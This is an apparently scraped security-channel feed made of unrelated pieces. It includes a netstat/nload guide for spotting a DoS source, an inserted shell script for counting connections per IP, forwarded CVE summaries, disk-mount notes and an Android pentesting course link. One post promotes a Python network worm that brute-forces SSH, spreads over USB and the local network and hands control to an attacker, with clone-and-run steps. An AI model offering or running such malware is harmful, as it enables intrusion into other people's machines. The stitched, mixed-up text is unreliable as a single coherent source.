▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
How to quickly check if your Linux server is under DoS attack from a single IP address?
A) What you need
The only thing you need to do this is a Linux server and a user with sudo privileges.
I will be demonstrating on Ubuntu Server 20.04.
We are going to use the netstat tool to find out what IPs are currently connected to your server.
To install netstat on Ubuntu, you actually install the net-tools package, for example:
sudo apt-get install net-tools -y
If you are using CentOS or a Red Hat based installation, netstat should already be installed.
B) How to check your server load
The first thing we're going to do is check the load on our server.
The command we will use for this will return the number of logical processors (threads).
On the server, this number should be pretty low, but it depends on what you are running.
While you know everything is in order, run the check and record the number as your baseline.
If you suspect something is happening, run the thread check again and compare the results.
To check the number of logical processors, enter the command:
grep processor /proc/cpuinfo | wc -l
If this number is significantly higher than your baseline, you may be in trouble.
For example, on my Pop!_OS I have 16 threads, but on a Nextcloud hosted Ubuntu server I only have two.
If any of these numbers doubled, I could be exposed to a DDoS attack.
C) How to check the load on your network
Next, we will check the load on our network.
It can be done with a number of tools, but I choose nload.
To install nload, enter the command:
sudo apt-get install nload -y
On CentOS, this command would be:
sudo dnf install nload -y
To run the tool, just enter the command:
nload
If this load is significantly higher than you expect, you may be under attack.
D) How to find out which IP addresses are connected to your server
The next thing you need to do is find out which IPs are connected to your server.
For this we will use netstat like this:
netstat -ntu | awk '{print $5}' | cut -d: -f1 -s | sort | uniq -c | sort -nk1 -r
The output from the above command will list each IP address connected to the server and the number of instances of each.
Be sure to review this list carefully. If you see an IP address with a large number of instances (over 100), the chances of the address being the culprit for the load are pretty high.
Once you are sure of culpability, you can block the IP address with the command (replace ADDRESS with that IP):
sudo route add ADDRESS reject
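The per-IP count above, as an added example that is not part of the original post: `cut -d: -f1` keeps only the text before the first colon, which truncates IPv6 peers, so this version strips just the trailing port and folds IPv4-mapped addresses into their IPv4 form. The function names and sample addresses are constructed for illustration; the 100-connection threshold is the one the post uses.

```shell
#!/bin/sh
# Added example: per-IP connection counts from `netstat -ntu` output.

# count_by_ip: read netstat output on stdin, print "COUNT IP", highest first.
# Only the trailing ":port" is stripped, so IPv6 peers stay whole.
count_by_ip() {
    awk '
        $1 ~ /^(tcp|udp)/ {              # skip the two netstat header lines
            peer = $5                    # Foreign Address column
            sub(/:[0-9*]+$/, "", peer)   # drop ":port" only
            sub(/^::ffff:/, "", peer)    # fold IPv4-mapped IPv6 into IPv4
            n[peer]++
        }
        END { for (ip in n) print n[ip], ip }
    ' | sort -k1,1nr -k2,2
}

# over_threshold LIMIT: print only peers with more than LIMIT connections.
over_threshold() {
    count_by_ip | awk -v limit="$1" '$1 > limit { print $2 }'
}

# Constructed sample: documentation addresses, one peer holding 120 sockets.
sample_netstat() {
    echo 'Active Internet connections (w/o servers)'
    echo 'Proto Recv-Q Send-Q Local Address Foreign Address State'
    i=0
    while [ "$i" -lt 120 ]; do
        echo "tcp 0 0 203.0.113.10:80 198.51.100.7:$((40000 + i)) ESTABLISHED"
        i=$((i + 1))
    done
    echo 'tcp 0 0 203.0.113.10:22 192.0.2.15:51514 ESTABLISHED'
    echo 'tcp6 0 0 ::ffff:203.0.113.10:80 ::ffff:192.0.2.15:50300 ESTABLISHED'
    echo 'tcp6 0 0 2001:db8::10:443 2001:db8::beef:50222 ESTABLISHED'
    echo 'udp 0 0 203.0.113.10:123 192.0.2.99:123 ESTABLISHED'
}

# Run against the sample; on a live host use: netstat -ntu | over_threshold 100
sample_netstat | count_by_ip
sample_netstat | over_threshold 100
```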
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from DailyCVE
Patch for Dell Wyse ThinOS authorization issue vulnerability:
https://dailycve.com/patch-dell-wyse-thinos-authorization-issue-vulnerability
Dailycve
Patch for Dell Wyse ThinOS authorization issue vulnerability | CVE
Details:
Dell Wyse ThinOS is a dedicated Dell Cloud Operating System from Dell (Dell). ThinOS 8.6 and previous versions of Dell Wyse have security bugs, and this flaw can be exploited by attackers to access writable files and exploit the configuration…
Forwarded from DailyCVE
Fix for the weakness of Adobe Photoshop heap buffer overflow:
https://dailycve.com/fix-weakness-adobe-photoshop-heap-buffer-overflow
Dailycve
Fix for the weakness of Adobe Photoshop heap buffer overflow | CVE
Details:
Adobe Photoshop, known as 'PS', is a platform for image editing developed and distributed by Adobe. Adobe Photoshop 22.1 and older releases provide the vulnerability of heap buffer overload. Attackers can run arbitrary code using this vulnerability…
Forwarded from UNDERCODE TESTING
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Python network worm that spreads on the local network and gives the attacker control of these machines:
You can bruteforce ssh servers, spread with USBs, etc.
INSTALLATION & RUN:
1) git clone https://github.com/pylyf/NetWorm.git
2) cd NetWorm
3) python worm.py
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from DailyCVE
Microsoft Windows Multipoint security vulnerability:
https://dailycve.com/microsoft-windows-multipoint-security-vulnerability
Dailycve
Microsoft Windows Multipoint security vulnerability | CVE
Details:
Microsoft Windows is an operating system that uses a collection of Microsoft Corporation personal computers. Windows Elevation in Privilege Risk Multipoint Control. No information on this weakness remains. At any moment, please follow CNNVD…
Forwarded from DailyCVE
Microsoft Walletservice access control error vulnerability:
https://dailycve.com/microsoft-walletservice-access-control-error-vulnerability
Dailycve
Microsoft Walletservice access control error vulnerability | CVE
Details:
Microsoft Walletservice is an application used by Microsoft for payment purposes. A susceptibility to privilege escalation occurs in Microsoft Walletservice. No information on this weakness remains.
Forwarded from UNDERCODE NEWS
GPS data reveals that some consumers of Parler engaged in protests at the American Chamber of Commerce.
#International
Forwarded from UNDERCODE NEWS
Behind the scenes, performance blinds, customers and security warning for windows 10.
#Vulnerabilities
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
How mount operation relates to partitioning and formatting
Mounting is one of the types of actions that you can perform on a disk (block device). Referring to the device by its name /dev/*, it is possible to:
1) create new partitions
2) delete existing partitions
3) format partitions or the entire disk
4) perform low-level settings at the device level (setting the read-only flag at the disk level, resetting the write cache on the disk, controlling Advanced Power Management, etc.), as well as read the values of these settings and disk properties
5) clone the contents of a disk using the dd command (or analogs) to a file or to another disk
6) restore the contents of a disk from a file with the dd command
7) mount disk partitions (or the entire disk if not partitioned)
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
The first routine patch of the year, 83 in all, including zero-day and pre-disclosed exploits.
#CyberAttacks #Analytiques
Forwarded from DailyCVE
Siemens Jt2go and Siemens Teamcenter Visualization authorization issue vulnerability:
https://dailycve.com/siemens-jt2go-and-siemens-teamcenter-visualization-authorization-issue-vulnerability
Dailycve
Siemens Jt2go and Siemens Teamcenter Visualization authorization issue vulnerability | CVE
Details:
The products of the German company Siemens are both Siemens Jt2go and Siemens Teamcenter Visualization. Siemens Jt2go is a viewer for JT files. The app is used for 3D graphics lightweight preview, which can handle 3D zoom, panoramic, rotate,…
Forwarded from DailyCVE
Siemens Solid Edge input validation error vulnerability:
https://dailycve.com/siemens-solid-edge-input-validation-error-vulnerability
Dailycve
Siemens Solid Edge input validation error vulnerability | CVE
Details:
Siemens Solid Edge is a 3D CAD application developed by Siemens in Germany. The software can be used in the design of components, assembly design, design of sheet metal, design of welding and other industries. There is a weakness previous to…
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
4.5 rating free Foundations of Hacking and Pentesting Android Apps:
Setting up Android Studio and Emulators
Basics of adb
Decompiling apks
Insecure Logging
Hardcoding Issues
Insecure Data Storage
Input Validation Issues
Drozer
Finding Attack Surfaces
Access Control Issues
Content Provider Injections
General Bug Hunting Tips
https://www.udemy.com/course/foundations-of-hacking-and-pentesting-android-apps/
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Udemy
Free Ethical Hacking Tutorial - Foundations of Hacking and Pentesting Android Apps
Learn how to hack Android apps, and find vulnerabilities - Free Course
Join UNDERCODE's Server on Discord: https://discord.gg/JMPHbGJG